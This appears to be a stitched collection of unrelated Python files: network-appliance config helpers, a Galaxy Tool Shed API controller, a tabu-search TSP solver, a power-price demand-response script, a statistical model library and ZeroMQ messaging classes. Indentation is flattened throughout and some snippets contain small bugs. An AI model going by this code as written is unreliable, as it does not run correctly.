if confFileTemp:
writeTemplate(config, confFileTemp, confFileToWrite)
def updateProxyConfig(config):
oldConfig = getConfig("proxy")
newConfig = {
"roleType": config.get("networkRole") or config.get("roleType") or oldConfig.get("RoleType"),
"port": config.get("targetPort") or config.get("port") or oldConfig.get("Port"),
"bind": config.get("targetIp") or config.get("bind") or oldConfig.get("Bind"),
"capture": config.get("captureMode") or config.get("capture") or oldConfig.get("Capture"),
"encryption": config.get("encryption") or config.get("encryption") or oldConfig.get("Encryption"),
"firewall": config.get("firewall") or config.get("firewall") or oldConfig.get("Firewall"),
"interface": config.get("monIntProxy") or config.get("interface") or oldConfig.get("Interface"),
"operationMode": "Proxy",
}
return newConfig
def updatePassiveConfig(config):
oldConfig = getPassiveConfig()
newConfig = {
"monitored_interface": config.get("monIntPsv") or config.get("monitored_interface") or oldConfig.get("Monitored_Interface"),
"operationMode": "Passive",
}
return newConfig
def updateTransparentConfig(config):
oldConfig = getTransparentConfig()
newConfig = {
"netmask": config.get("netmask") or oldConfig.get("Netmask"),
"broadcastIp": config.get("broadcastIp") or oldConfig.get("BroadcastIp"),
"bridgeIp": config.get("bridgeIp") or oldConfig.get("BridgeIp"),
"interface1": config.get("brdgInt1") or config.get("interface1") or oldConfig.get("Interface1"),
"interface2": config.get("brdgInt2") or config.get("interface2") or oldConfig.get("Interface2"),
"gateway": config.get("gateway") or oldConfig.get("Gateway"),
"route": config.get("route") or oldConfig.get("Route"),
"operationMode": "Transparent"
}
return newConfig
def updateArmoreConfig(config):
oldConfig = getArmoreConfig()
internalInt = config.get("intInt") or oldConfig.get("Internal_Interface")
externalInt = config.get("extInt") or oldConfig.get("External_Interface")
newConfig = {
"operationMode": config.get("operationMode") or config.get("Operation") or oldConfig.get("Operation"),
"managementIp": config.get("mgtIp") or config.get("managementIp") or oldConfig.get("Management_IP"),
"managementMask": config.get("mgtMsk") or config.get("managementMask") or oldConfig.get("Management_Mask"),
"managementInterface": config.get("mgtInt") or config.get("managementInterface") or oldConfig.get("Management_Interface"),
"internalInterface": internalInt,
"internalIp": config.get("intIp") or oldConfig.get("Internal_IP") or netLib.getIpAddrFromInt(internalInt),
"internalMask": config.get("intMsk") or oldConfig.get("Internal_Mask") or netLib.getNetmaskFromInt(internalInt),
"externalInterface": externalInt,
"externalIp": config.get("extIp") or oldConfig.get("External_IP") or netLib.getIpAddrFromInt(externalInt),
"externalMask": config.get("extMsk") or oldConfig.get("External_Mask") or netLib.getNetmaskFromInt(externalInt),
}
restartFlask = oldConfig.get("Management_IP") != newConfig.get("managementIp")
return newConfig, restartFlask
# Writes the backend configuration file
def writeBackendConfig(config):
mode = config.get("operationMode")
tempToRead = None
if mode == "Proxy":
tempToRead = PROXY_CFG_BACKEND_TEMPLATE
elif mode == "Passive":
tempToRead = PASSIVE_CFG_BACKEND_TEMPLATE
elif mode == "Transparent":
tempToRead = TRANSPARENT_CFG_BACKEND_TEMPLATE
writeTemplate(config, tempToRead, PROXY_CFG_FILE_BACKEND)
# Changes existing settings to newly submitted values
def updateConfig(config, confType, enforce=False):
mode = config.get("operationMode") or config.get("Operation")
newConfig = None
restartFlask = False
if confType == "mode":
if mode.lower() == "proxy":
newConfig = updateProxyConfig(config)
elif mode.lower() == "passive":
newConfig = updatePassiveConfig(config)
elif mode.lower() == "transparent":
newConfig = updateTransparentConfig(config)
writeConfig(newConfig, confType)
if enforce:
newArmoreConfig, restartFlask = updateArmoreConfig(config)
writeConfig(newArmoreConfig, "armore")
amConf = newConfig.copy()
amConf.update(newArmoreConfig)
writeBackendConfig(amConf)
print("# Restarting ARMORE service...")
writeInterfacesFile(amConf, mode.lower())
restartProxy()
elif confType == "armore":
newArmoreConfig, restartFlask = updateArmoreConfig(config)
writeConfig(newArmoreConfig, confType)
elif confType == "backend":
writeBackendConfig(config)
return False
def writeArmoreConfig(config):
oldConfig = getConfigFromFile(ARMORE_CFG_FILE)
newConfigStr = "#!/usr/bin/env bash\n"
restartFlask = False
for key in config:
if type(config[key]) is dict:
for k in config[key]:
newConfigStr += "{0}_{1}=\"{2}\"\n".format(key, k, config[key][k])
elif type(config[key]) is str:
newConfigStr += "{0}=\"{1}\"\n".format(key, config[key])
newConfigFile = open(ARMORE_CFG_FILE, 'w')
newConfigFile.write(newConfigStr)
newConfigFile.close()
if bool(oldConfig) and oldConfig["Management_IP"] != config["Management"]["IP"]:
restartFlask = True
return restartFlask
def writeProxyConfig(config):
oldConfig = getProxyConfig()
oldConfigFile = open(PROXY_CFG_FILE, 'r')
headerLines = oldConfigFile.readlines()[:3]
oldVals = oldConfigFile.readlines()[3:]
oldConfigFile.close()
newConfigFile = open(PROXY_CFG_FILE, 'w')
for l in headerLines:
newConfigFile.write(l)
newConfigFile.write('\n')
newConfig = {}
#for c in oldConfig:
# newConfig[c] = oldConfig[c]
for c in config:
if config[c]:
newConfig[c] = config[c]
for c in newConfig:
newConfigFile.write("{0} = {1}\n".format(c, newConfig[c]))
newConfigFile.close()
restartProxy()
def enforceArmoreConfig():
config = getArmoreConfig()
if not config:
return 0
ipAddrs = {}
intTypes = ["Management", "External", "Internal"]
for intType in intTypes:
keyInt = intType + "_Interface"
keyIp = intType + "_IP"
if keyInt in config and keyIp in config:
ipAddrs[config[keyInt]] = config[keyIp]
else:
ipAddrs["eth0"] = '127.0.0.1'
netLib.setIps(ipAddrs)
def updateIpAddrs(ipAddrsConfig):
del ipAddrsConfig["Operation"]
ipAddrs = {}
for intType in ipAddrsConfig:
ipAddrs[ipAddrsConfig[intType]["Interface"]] = ipAddrsConfig[intType]["IP"]
netLib.setIps(ipAddrs)
# Writes template information into /etc/network/interfaces file based on the mode selected
def writeInterfacesFile(config, configType):
writeTemplate(config, netFiles[configType], "/etc/network/interfaces")
#comLib.cmd("service networking restart")
# Gets current mode of operation based on backend
def getOperationMode():
with open("/etc/armore/armoreconfig", 'r') as f:
for l in [x.rstrip() for x in f.readlines()]:
if re.search("Operation", l):
_, value = l.replace(" ", "").split("=")
return value
# Called when ARMORE first starts to ensure config files exist and are synched with backend properly
def createArmoreModeConfigFiles(supportFilePath="/var/webServer/supportFiles.txt"):
configs = [
"ArmoreConfig",
"ProxyConfig",
"TransparentConfig",
"PassiveConfig"
]
print("# Creating Config Files")
backendConfig = getArmoreConfigBackend()
intIpsDict = netLib.getInterfaceIps()
for c in configs:
cPath = comLib.getSupportFilePath(c, supportFilePath)
ctPath = comLib.getSupportFilePath("{}Template".format(c), supportFilePath)
if not os.path.exists(cPath):
theDict = {}
currConfig = getArmoreConfig()
if c == "ArmoreConfig":
theDict["managementIp"] = backendConfig.get("ManagementIp")
theDict["managementMask"] = backendConfig.get("ManagementMask")
theDict["managementInterface"] = backendConfig.get("ManagementInt")
intsUsed = [backendConfig.get("ManagementInt")]
intToUse = ""
for i in intIpsDict:
if i not in intsUsed:
intToUse = i
intsUsed.append(i)
break
theDict["internalIp"] = intIpsDict[intToUse]
theDict["internalMask"] = netLib.getNetmaskFromInt(intToUse)
theDict["internalInterface"] = intToUse
for i in intIpsDict:
if i not in intsUsed:
intToUse = i
intsUsed.append(i)
break
theDict["externalIp"] = intIpsDict[intToUse]
theDict["externalMask"] = netLib.getNetmaskFromInt(intToUse)
theDict["externalInterface"] = intToUse
theDict["operation"] = getOperationMode()
elif c == "ProxyConfig":
if backendConfig.get("Operation") == "Proxy":
theDict["roleType"] = backendConfig.get("Roletype")
theDict["port"] = backendConfig.get("Port")
theDict["bind"] = backendConfig.get("Bind")
theDict["capture"] = backendConfig.get("Capture")
theDict["encryption"] = backendConfig.get("Encryption")
theDict["firewall"] = backendConfig.get("Firewall")
theDict["interface"] = backendConfig.get("Interface")
else:
theDict["roleType"] = "Server"
theDict["port"] = "5555"
theDict["bind"] = "127.0.0.2"
theDict["capture"] = "NetMap"
theDict["encryption"] = "Enabled"
theDict["firewall"] = "Disabled"
theDict["interface"] = "eth1"
elif c == "TransparentConfig":
theDict["netmask"] = "255.255.255.0"
theDict["broadcastIp"] = "127.0.0.2"
theDict["bridgeIp"] = "127.0.0.3"
theDict["interface1"] = "eth1"
theDict["interface2"] = "eth2"
theDict["gateway"] = "127.0.0.1"
theDict["route"] = "127.0.0.1/8"
elif c == "PassiveConfig":
theDict["monitored_interface"] = "eth1"
writeTemplate(theDict, ctPath, cPath)
'''
t = open(ctPath, 'r')
temp = Template(t.read())
t.close()
f = open(cPath, 'w')
f.write(temp.substitute(theDict))
f.close()
'''
|
<filename>lib/galaxy/webapps/tool_shed/api/groups.py
import logging
from galaxy import util
from galaxy import web
from galaxy.util import pretty_print_time_interval
from galaxy.exceptions import RequestParameterMissingException
from galaxy.exceptions import AdminRequiredException
from galaxy.exceptions import ObjectNotFound
from galaxy.web import require_admin as require_admin
from galaxy.web import _future_expose_api as expose_api
from galaxy.web import _future_expose_api_anonymous_and_sessionless as expose_api_anonymous_and_sessionless
from galaxy.web.base.controller import BaseAPIController
from tool_shed.managers import groups
log = logging.getLogger( __name__ )
class GroupsController( BaseAPIController ):
"""RESTful controller for interactions with groups in the Tool Shed."""
def __init__( self, app ):
super( GroupsController, self ).__init__( app )
self.group_manager = groups.GroupManager()
def __get_value_mapper( self, trans ):
value_mapper = { 'id' : trans.security.encode_id }
return value_mapper
@expose_api_anonymous_and_sessionless
def index( self, trans, deleted=False, **kwd ):
"""
GET /api/groups
Return a list of dictionaries that contain information about each Group.
:param deleted: flag used to include deleted groups
Example: GET localhost:9009/api/groups
"""
group_dicts = []
deleted = util.asbool( deleted )
if deleted and not trans.user_is_admin():
raise AdminRequiredException( 'Only administrators can query deleted groups.' )
for group in self.group_manager.list( trans, deleted ):
group_dicts.append( self._populate( trans, group ) )
return group_dicts
@expose_api
@require_admin
def create( self, trans, payload, **kwd ):
"""
POST /api/groups
Return a dictionary of information about the created group.
The following parameters are included in the payload:
:param name (required): the name of the group
:param description (optional): the description of the group
Example: POST /api/groups/?key=XXXYYYXXXYYY
Content-Disposition: form-data; name="name" Group_Name
Content-Disposition: form-data; name="description" Group_Description
"""
group_dict = dict( message='', status='ok' )
name = payload.get( 'name', '' )
if name:
description = payload.get( 'description', '' )
if not description:
description = ''
else:
# TODO add description field to the model
group_dict = self.group_manager.create( trans, name=name ).to_dict( view='element', value_mapper=self.__get_value_mapper( trans ) )
else:
raise RequestParameterMissingException( 'Missing required parameter "name".' )
return group_dict
@expose_api_anonymous_and_sessionless
def show( self, trans, encoded_id, **kwd ):
"""
GET /api/groups/{encoded_group_id}
Return a dictionary of information about a group.
:param id: the encoded id of the Group object
Example: GET localhost:9009/api/groups/f9cad7b01a472135
"""
decoded_id = trans.security.decode_id( encoded_id )
group = self.group_manager.get( trans, decoded_id )
if group is None:
raise ObjectNotFound( 'Unable to locate group record for id %s.' % ( str( encoded_id ) ) )
return self._populate( trans, group )
def _populate( self, trans, group ):
"""
Turn the given group information from DB into a dict
and add other characteristics like members and repositories.
"""
model = trans.app.model
group_dict = group.to_dict( view='collection', value_mapper=self.__get_value_mapper( trans ) )
group_members = []
group_repos = []
total_downloads = 0
for uga in group.users:
user = trans.sa_session.query( model.User ).filter( model.User.table.c.id == uga.user_id ).one()
user_repos_count = 0
for repo in trans.sa_session.query( model.Repository ) \
.filter( model.Repository.table.c.user_id == uga.user_id ) \
.join( model.RepositoryMetadata.table ) \
.join( model.User.table ) \
.outerjoin( model.RepositoryCategoryAssociation.table ) \
.outerjoin( model.Category.table ):
categories = []
for rca in repo.categories:
cat_dict = dict( name=rca.category.name, id=trans.app.security.encode_id( rca.category.id ) )
categories.append( cat_dict )
time_repo_created_full = repo.create_time.strftime( "%Y-%m-%d %I:%M %p" )
time_repo_updated_full = repo.update_time.strftime( "%Y-%m-%d %I:%M %p" )
time_repo_created = pretty_print_time_interval( repo.create_time, True )
time_repo_updated = pretty_print_time_interval( repo.update_time, True )
approved = ''
ratings = []
for review in repo.reviews:
if review.rating:
ratings.append( review.rating )
if review.approved == 'yes':
approved = 'yes'
# TODO add user ratings
ratings_mean = str( float( sum( ratings ) ) / len( ratings ) ) if len( ratings ) > 0 else ''
total_downloads += repo.times_downloaded
group_repos.append( { 'name': repo.name,
'times_downloaded': repo.times_downloaded,
'owner': repo.user.username,
'time_created_full': time_repo_created_full,
'time_created': time_repo_created,
'time_updated_full': time_repo_updated_full,
'time_updated': time_repo_updated,
'description': repo.description,
'approved': approved,
'ratings_mean': ratings_mean,
'categories' : categories } )
user_repos_count += 1
encoded_user_id = trans.app.security.encode_id( repo.user.id )
user_repos_url = web.url_for( controller='repository', action='browse_repositories_by_user', user_id=encoded_user_id )
time_created = pretty_print_time_interval( user.create_time, True )
member_dict = { 'id': encoded_user_id, 'username': user.username, 'user_repos_url': user_repos_url, 'user_repos_count': user_repos_count, 'user_tools_count': 'unknown', 'time_created': time_created }
group_members.append( member_dict )
group_dict[ 'members' ] = group_members
group_dict[ 'total_members' ] = len( group_members )
group_dict[ 'repositories' ] = group_repos
group_dict[ 'total_repos' ] = len( group_repos )
group_dict[ 'total_downloads' ] = total_downloads
return group_dict
|
<gh_stars>100-1000
from itertools import combinations
import os,sys,copy
import numpy as np
import time
import matplotlib.pyplot as plt
from GetData import *
from tqdm import tqdm
class Tabu():
def __init__(self,disMatrix,max_iters=50,maxTabuSize=10):
"""parameters definition"""
self.disMatrix = disMatrix
self.maxTabuSize = maxTabuSize
self.max_iters = max_iters
self.tabu_list=[]
def get_route_distance(self,route):
'''
Description: function to calculate total distance of a route. evaluate function.
parameters: route : list
return : total distance : folat
'''
routes = [0] + route + [0] # add the start and end point
total_distance = 0
for i,n in enumerate(routes):
if i != 0 :
total_distance = total_distance + self.disMatrix[last_pos][n]
last_pos = n
return total_distance
def exchange(self,s1,s2,arr):
"""
function to Swap positions of two elements in an arr
Args: int,int,list
s1 : target 1
s2 : target 2
arr : target array
Ouput: list
current_list : target array
"""
current_list = copy.deepcopy(arr)
index1 , index2 = current_list.index(s1) , current_list.index(s2) # get index
current_list[index1], current_list[index2]= arr[index2] , arr[index1]
return current_list
def generate_initial_solution(self,num=10,mode='greedy'):
"""
function to get the initial solution,there two different way to generate route_init.
Args:
num : int
the number of points
mode : string
"greedy" : advance step by choosing optimal one
"random" : randomly generate a series number
Ouput: list
s_init : initial solution route_init
"""
if mode == 'greedy':
route_init=[0]
for i in range(num):
best_distance = 10000000
for j in range(num+1):
if self.disMatrix[i][j] < best_distance and j not in route_init:
best_distance = self.disMatrix[i][j]
best_candidate = j
route_init.append(best_candidate)
route_init.remove(0)
if mode == 'random':
route_init = np.arange(1,num+1) #init solution from 1 to num
np.random.shuffle(route_init) #shuffle the list randomly
return list(route_init)
def tabu_search(self,s_init):
"""tabu search"""
s_best = s_init
bestCandidate = copy.deepcopy(s_best)
routes , temp_tabu = [] , [] # init
routes.append(s_best)
while(self.max_iters):
self.max_iters -= 1 # Number of iterations
neighbors = copy.deepcopy(s_best)
for s in combinations(neighbors, 2):
sCandidate = self.exchange(s[0],s[1],neighbors) # exchange number to generate candidates
if s not in self.tabu_list and self.get_route_distance(sCandidate) < self.get_route_distance(bestCandidate):
bestCandidate = sCandidate
temp_tabu = s
if self.get_route_distance(bestCandidate) < self.get_route_distance(s_best): # record the best solution
s_best = bestCandidate
if temp_tabu not in self.tabu_list:
self.tabu_list.append(temp_tabu)
if len(self.tabu_list) > self.maxTabuSize :
self.tabu_list.pop(0)
routes.append(bestCandidate)
return s_best, routes
if __name__ == "__main__":
np.random.seed(2020)
customerNum = 10 # 定义多少个点
data=GetData()
tsp_data = data.generate_locations(num_points=customerNum+1,map_size=100) #在100*100的图中,随机生成位置,customerNum+1 多一个depot点
dismatrix = data.get_euclidean_distance_matrix(tsp_data.locations)
# data.plot_nodes(tsp_data.locations)
""" Tabu :
disMatrix : the distance matrix from 0 to X , 0 represernt starting and stopping point。
for example: disMatrix = [[0,3,4,...
1,0,5,...
3,5,0,...]]
that means the distance from 0 to 0 is 0, from 0 to 1 is 3,... from 1 to 3 is 5....
max_iters : maximum iterations
maxTabuSize : maximum iterations
"""
tsp = Tabu(disMatrix=dismatrix ,max_iters=20,maxTabuSize=10) # 设置参数
# two different way to generate initial solution
# num : the number of points
s_init = tsp.generate_initial_solution(num=customerNum,mode='greedy') # mode = "greedy" or "random"
print('init route : ' , s_init)
print('init distance : ' , tsp.get_route_distance(s_init))
start = time.time()
best_route , routes = tsp.tabu_search(s_init) # tabu search
end = time.time()
print('best route : ' , best_route)
print('best best_distance : ' , tsp.get_route_distance(best_route))
print('the time cost : ',end - start )
# plot the result changes with iterations
results=[]
for i in routes:
results.append(tsp.get_route_distance(i))
plt.plot(np.arange(len(results)) , results)
plt.show()
# plot the route
data.plot_route(tsp_data.locations,[0]+best_route+[0])
|
<reponame>flexbox-nicaragua/flexbox-code
# Copyright 2016 The Flexbox Authors. All rights reserved.
# Licensed under the open source MIT License, which is in the LICENSE file.
from bs4 import BeautifulSoup
import urllib2
import re
from datetime import datetime, timedelta
import pandas as pd
from sqlalchemy import cast,Date,text
from sqlalchemy.exc import IntegrityError
from flexbox import psql_server
url = 'http://www.cndc.org.ni/Principal/PREDESPACHO_archivos/sheet002.htm'
try:
response = urllib2.urlopen(url)
except:
response = urllib2.urlopen(url.replace('_archivos','_files'))
data = response.read()
soup = BeautifulSoup(data,"html5lib")
column_list = [header.text.encode('ascii','ignore') for header in soup.find('table').findAll('tr')[10].findAll('td')]
column_list.insert(0,'HORA')
column_list = column_list[:column_list.index('IND')+2]
column_list.insert(column_list.index('IND'),'Demanda')
column_list.insert(column_list.index('IND'),'Bombeo')
prices = []
for val in range(11,35):
output_dict = {}
row = [header.text.encode('ascii','ignore') for header in soup.find('table').findAll('tr')[val].findAll('td')][:len(column_list)]
for i,column in enumerate(column_list):
if column == 'IND':
prices.append(float(row[i]))
dt_indexes = []
for i in range(0,24):
dt_indexes.append(datetime(datetime.now().year,
datetime.now().month,datetime.now().day)+timedelta(hours=i))
pred_actual_prices = pd.DataFrame(prices,index=dt_indexes)
pred_actual_prices.columns = ['IND']
pred_actual_prices['date'] = pred_actual_prices.index.date
pred_actual_prices['hour'] = pred_actual_prices.index.hour
pred_actual_prices['prog_ind'] = pred_actual_prices['IND']
###
### Beggining to Chose the DR Event for the Next Day
sub_date = pred_actual_prices
sub_date['rolling_rank3'] = [None] * len(sub_date['prog_ind'])
sub_date['rolling_rank2'] = [None] * len(sub_date['prog_ind'])
for i,val in enumerate(sub_date['prog_ind']):
if i <= 21:
sub_date['rolling_rank3'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1] + sub_date['prog_ind'][i+2])/3
sub_date['rolling_rank2'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1])/2
if i == 22:
sub_date['rolling_rank3'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1])/2
sub_date['rolling_rank2'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1])/2
if i == 23:
sub_date['rolling_rank3'][i] = sub_date['prog_ind'][i]
sub_date['rolling_rank2'][i] = sub_date['prog_ind'][i]
else:
pass
# Creating the rolling rank
sub_date_sorted = sub_date.sort_values(by='rolling_rank3',ascending=False)
##
## Chosing the Event
highest_hour_price = sub_date[sub_date['prog_ind'] == max(sub_date['prog_ind'])][['prog_ind','hour']].rename(columns={'prog_ind':'price'})
highest_hour_price['event'] = 'hour'
three_hour_dr = sub_date[sub_date['rolling_rank3'] == max(sub_date['rolling_rank3'])][['rolling_rank3','hour']].rename(columns={'rolling_rank3':'price'})
three_hour_dr['event'] = 'three_hour'
two_hour_dr = sub_date[sub_date['rolling_rank2'] == max(sub_date['rolling_rank2'])][['rolling_rank2','hour']].rename(columns={'rolling_rank2':'price'})
two_hour_dr['event'] = 'two_hour'
highest_hour_price = highest_hour_price.append(three_hour_dr)
highest_hour_price = highest_hour_price.append(two_hour_dr)
max_price_event = highest_hour_price[highest_hour_price['event'] == 'hour']
two_three_dr_hours = range(highest_hour_price[highest_hour_price['event'] == 'three_hour']['hour'][0],highest_hour_price[highest_hour_price['event'] == 'three_hour']['hour'][0]+3)\
+ range(highest_hour_price[highest_hour_price['event'] == 'two_hour']['hour'][0],highest_hour_price[highest_hour_price['event'] == 'two_hour']['hour'][0]+2)
if max_price_event['hour'][0] not in two_three_dr_hours:
event = highest_hour_price[highest_hour_price['event'] == 'hour']
elif highest_hour_price[highest_hour_price['event'] == 'three_hour']['price'][0] >= highest_hour_price[highest_hour_price['event'] == 'two_hour']['price'][0] :
event = highest_hour_price[highest_hour_price['event'] == 'three_hour']
elif highest_hour_price[highest_hour_price['event'] == 'three_hour']['price'][0] < highest_hour_price[highest_hour_price['event'] == 'two_hour']['price'][0] :
event = highest_hour_price[highest_hour_price['event'] == 'two_hour']
if event.shape[0] > 1:
event = event.head(1)
else:
pass
if event['event'][0] == 'hour':
event['additional_hours'] = 0
elif event['event'][0] == 'two_hour':
event['additional_hours'] = 1
elif event['event'][0] == 'three_hour':
event['additional_hours'] = 2
else:
pass
hours_list = list(range(event['hour'][0],event['hour'][0] + event['additional_hours'][0]+1))
hour_start = int(event['hour'][0])
duration = (event['additional_hours'][0]+1)*60
output_dict = {}
metadata = psql_server.get_metadata()
table_dict = psql_server.setup_tables(metadata_control)
output_dict = {}
output_dict['date'] = event.index.date[0]
output_dict['hour_start'] = hour_start
output_dict['datetime'] = datetime.combine(event.index.date[0],\
datetime.min.time())+timedelta(hours=hour_start)
output_dict['signal'] = 1
output_dict['duration_minutes']=duration
print output_dict
psql_server.add_values_to_table(table_dict['peak_shifting_dr_table'],output_dict) |
import numpy as np
import pandas as pd
from scipy import stats, optimize
import patsy
import prettytable
class Response(object):
def __init__(self, y):
self.y = y
self.Kmin = np.apply_along_axis(max, 1, y)
class Submodel(object):
def __init__(self, name, code, formula, invlink, data):
self.name = name
self.code = code
self.formula = formula
self.invlink = invlink
self.data = data
self.estimates = None
self.vcov = None
self.coefnames = self.get_coefnames()
def dmatrix(self):
return patsy.dmatrix(self.formula, self.data)
def get_coefnames(self):
return self.dmatrix().design_info.column_names
def npars(self):
return len(self.coefnames)
def predict(self, transform=True, interval=True, level=95, beta=None):
level = level/100 if level > 1 else level
beta = self.estimates if beta is None else beta
if beta is None:
raise AttributeError("Model has not been fit yet")
modmat = self.dmatrix()
lp = np.matmul(modmat, beta)
if not interval:
if not transform:
return lp
else:
return self.invlink(lp)
vcov = np.matmul(np.matmul(modmat, self.vcov), modmat.transpose())
se = np.sqrt(vcov.diagonal())
ci = stats.norm.interval(level, loc=lp, scale=se)
out = pd.DataFrame({"Prediction":lp, "lower":ci[0], "upper":ci[1]})
if transform:
out = self.invlink(out)
return out
def get_vcov(self, opt):
self.vcov = opt.hess_inv[self.index,:][:,self.index]
def get_estimates(self, opt):
self.estimates = opt.x[self.index]
def check_fit(self):
if self.estimates is None:
raise AttributeError("Model has not been fit yet")
def SE(self):
self.check_fit()
return np.sqrt(self.vcov.diagonal())
def confint(self, level=95):
level = level/100 if level > 1 else level
return stats.norm.interval(level, loc=self.estimates, scale=self.SE())
def summary(self, level=95):
level = level/100 if level > 1 else level
ci = self.confint(level)
tab = prettytable.PrettyTable()
tab.add_column("Parameter", self.coefnames)
tab.add_column("Estimate", self.estimates.round(4))
tab.add_column("SE", self.SE().round(4))
tab.add_column("lower", ci[0].round(4))
tab.add_column("upper", ci[1].round(4))
print(self.name+": "+self.formula)
print(tab)
def print(self, level=95):
self.summary(level=level)
def coeftable(self, level=95):
ci = self.confint(level)
return pd.DataFrame({"Model": np.repeat(self.code, len(self.coefnames)),
"Parameter": self.coefnames, "Estimate": self.estimates,
"SE": self.SE(), "lower": ci[0], "upper": ci[1]})
class SubmodelDict(object):
def __init__(self, **args):
self.submodels = args
idx = 0
for i in self.submodels:
self.submodels[i].index = np.arange(len(self.submodels[i].coefnames))
self.submodels[i].index += idx
idx += len(self.submodels[i].index)
def npars(self):
return sum(dict.values({key: x.npars() for key, x in self.submodels.items()}))
def get_estimates(self, opt):
for i in self.submodels:
self.submodels[i].get_estimates(opt)
def get_vcov(self, opt):
for i in self.submodels:
self.submodels[i].get_vcov(opt)
def summary(self, level=95):
for i in self.submodels:
self.submodels[i].summary(level=level)
print("")
def coeftable(self, level=95):
tabs = {k: x.coeftable(level=level) for k, x in self.submodels.items()}
tabs = pd.concat(tabs)
return tabs.reset_index(drop=True)
def print(self, level=95):
self.summary(level=level)
class UnmarkedModel(object):
def __init__():
pass
def __getitem__(self, arg):
return self.submodels.submodels[arg]
def negloglik(self, x, mod, K):
pass
def fit(self, x0=None, tol=None, K=None):
tol = 1e-6 * self.response.y.shape[0] if tol is None else tol
#gtol = 1e-6 if gtol is None else gtol
x0 = np.repeat(0, self.submodels.npars()) if x0 is None else x0
K = self.response.y.max() + 20 if K is None else K
self.opt = optimize.minimize(self.negloglik, x0, (self, K), method="BFGS",
options={"gtol": tol})
self.opt.tol = tol
self.opt.K = K
self.submodels.get_estimates(self.opt)
self.submodels.get_vcov(self.opt)
def check_fit(self):
if 'opt' not in dir(self):
raise AttributeError("Model has not been fit yet")
def AIC(self):
self.check_fit()
return 2 * self.opt.fun + 2 * self.submodels.npars()
def summary(self, level=95):
self.submodels.summary(level=level)
print("AIC: "+str(round(self.AIC(), 4)))
print("Converged: "+str(self.opt.success))
def coeftable(self, level=95):
return self.submodels.coeftable(level=level)
def predict(self, type, transform=True, interval=True, level=95):
return self[type].predict(transform=transform, interval=interval,
level=level)
def simulate(self):
pass
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2017, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
'''VOLTTRON platform™ messaging classes.'''
from __future__ import absolute_import
import collections
import zmq
from zmq.utils import jsonapi
from .headers import Headers
__all__ = ['Headers', 'Socket']
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2016, Battelle Memorial Institute'
__license__ = 'FreeBSD'
class Socket(zmq.Socket):
'''ØMQ socket with additional agent messaging methods.'''
def __new__(cls, socket_type, context=None):
if not context:
context = zmq.Context.instance()
return zmq.Socket.__new__(cls, context, socket_type)
def __init__(self, socket_type, context=None):
super(Socket, self).__init__(self.context, socket_type)
# Override send_string to ensure copy defaults to True.
# https://github.com/zeromq/pyzmq/pull/456
def send_string(self, u, flags=0, copy=True, encoding='utf-8'):
super(Socket, self).send_string(
u, flags=flags, copy=copy, encoding=encoding)
send_string.__doc__ = zmq.Socket.send_string.__doc__
def recv_message(self, flags=0):
'''Recieve a message as (topic, headers, message) tuple.'''
topic = self.recv_string(flags)
headers = self.recv_string(flags) if self.rcvmore else ''
headers = jsonapi.loads(headers) if headers else {}
message = self.recv_multipart(flags) if self.rcvmore else []
return topic, Headers(headers), message
def recv_message_ex(self, flags=0):
'''Receive a message as (content type, message) tuples.
Like recv_message(), returns a three tuple. However, the final
message component contains a list of 2-tuples instead of a list
of messages. These 2-tuples contain the content- type and the
data.
'''
topic, headers, message = self.recv_message(flags)
message = zip(headers['Content-Type'], message)
return topic, headers, message
def send_message(self, topic, headers, *msg_parts, **kwargs):
'''Send a multipart message with topic and headers.
Send a multipart message on the socket with topic being a UTF-8
string, headers can be a dictionary or a Headers object, and
msg_parts is the optional parts of the message. The media or
content type of each message component should be included in the
'Content-Type' header which should be a list of MIME types or a
string if there is only one message part.
'''
flags = kwargs.pop('flags', 0)
if kwargs:
raise TypeError('send_message() got unexpected keyword '
'arugment(s): ' + ', '.join(kwargs))
if not isinstance(headers, Headers):
headers = Headers(headers) if headers else Headers()
self.send_string(topic, flags | zmq.SNDMORE)
self.send_json(headers.dict, flags | (zmq.SNDMORE if msg_parts else 0))
if msg_parts:
self.send_multipart(msg_parts, flags)
def send_message_ex(self, topic, headers, *msg_tuples, **kwargs):
'''Send messages given as (content-type, message) tuples.
Similar to the send_message method except that messages are given as
2-tuples with the MIME type as the first element and the message
data as the second element.
'''
headers = Headers(headers) if headers else Headers()
headers['Content-Type'], msg_parts = zip(*msg_tuples)
self.send_message(topic, headers.dict, *msg_parts, **kwargs)
|
#!/usr/local/bin/python3
python = 3
try:
xrange
python = 2
except:
pass
if python == 2:
raise Exception("Use python3")
import base64
import codecs
import hashlib
import os
import re
import subprocess
UGLIFY = True
#UGLIFY = False
reScript = re.compile('<script(?:[^>]+)src="([^"]*)"(?:[^>]*)>((?:.|\n)*?)</script>')
reStyle = re.compile('<link(?:[^>]+)href="([^"]*)"(?:[^>]*)/(?:[^>]*)>')
reJpg = re.compile('url\\(([^)]+.jpg)\\)')
